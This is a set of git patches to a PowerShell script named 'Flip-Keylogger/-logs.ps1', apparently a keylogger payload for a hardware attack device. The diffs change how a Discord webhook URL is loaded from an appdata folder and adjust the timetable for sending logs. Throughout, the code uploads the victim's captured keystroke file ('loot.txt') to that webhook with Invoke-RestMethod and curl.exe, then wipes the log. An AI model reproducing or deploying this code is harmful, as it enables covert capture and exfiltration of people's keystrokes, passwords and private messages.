c37f6c413324d9ae3fad6e1f89fd7bebd3fd988f Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Fri, 23 Dec 2022 14:34:52 -0600 Subject: [PATCH 27/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 21 ++++++++------------- 1 file changed, 8 insertions(+), 13 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index f8c9cdb..17d936e 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -4,7 +4,7 @@ $Path="$env:appdata\-locker\$env:UserName-loot.txt" -$dc = [IO.File]::ReadAllText(".\wh.txt") +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) function Upload-Discord { @@ -16,7 +16,6 @@ param ( [string]$text ) -$hookurl = "$dc" $Body = @{ 'username' = $env:username @@ -24,15 +23,11 @@ $Body = @{ } if (-not ([string]::IsNullOrEmpty($text))){ -Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; -if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} } -if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"} - - - # times logs will be sent [keep in military time] $logTimes = @( '00:00:00', @@ -47,10 +42,10 @@ $logTimes = @( '09:00:00', '10:00:00', '11:00:00', - '14:11:00', - '14:11:15', - '14:11:30', - '14:11:45', + '12:00:00', + '13:00:00', + '14:00:00', + '15:00:00', '16:00:00', '17:00:00', '18:00:00', @@ -82,7 +77,7 @@ while ($true) { # runs keylogger Upload-Discord -file $Path - echo "" > $Path + echo "" > $Path } From 206039521f5a01d0812e6d5daf23b414f525f58c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 24 Dec 2022 00:07:06 -0600 Subject: [PATCH 28/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index 17d936e..7ee8835 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} # times logs will be sent [keep in military time] $logTimes = @( - '00:00:00', - '01:00:00', - '02:00:00', - '03:00:00', + '00:20:00', + '00:20:15', + '00:20:30', + '00:20:45', '04:00:00', '05:00:00', '06:00:00', From e22e18cc91b4423c34ef7faafdb039e3b3182b3a Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 24 Dec 2022 00:25:39 -0600 Subject: [PATCH 29/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index 7ee8835..1549280 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} # times logs will be sent [keep in military time] $logTimes = @( - '00:20:00', - '00:20:15', - '00:20:30', - '00:20:45', + '00:30:00', + '00:30:15', + '00:30:30', + '00:30:45', '04:00:00', '05:00:00', '06:00:00', From 74cdae15d9289f497c9ae61513cecc750e8563af Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 24 Dec 2022 00:32:03 -0600 Subject: [PATCH 30/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index 1549280..f02c0fd 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} # times logs will be sent [keep in military time] $logTimes = @( - '00:30:00', - '00:30:15', - '00:30:30', - '00:30:45', + '00:36:00', + '00:36:15', + '00:36:30', + '00:36:45', '04:00:00', '05:00:00', '06:00:00', From a148812b3d06abae04fa1eb6e81ef04e61e6ea36 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 24 Dec 2022 00:40:04 -0600 Subject: [PATCH 31/31] Update -logs.ps1 --- Payloads/Flip-Keylogger/-logs.ps1 | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 index f02c0fd..17d936e 100644 --- a/Payloads/Flip-Keylogger/-logs.ps1 +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} # times logs will be sent [keep in military time] $logTimes = @( - '00:36:00', - '00:36:15', - '00:36:30', - '00:36:45', + '00:00:00', + '01:00:00', + '02:00:00', + '03:00:00', '04:00:00', '05:00:00', '06:00:00',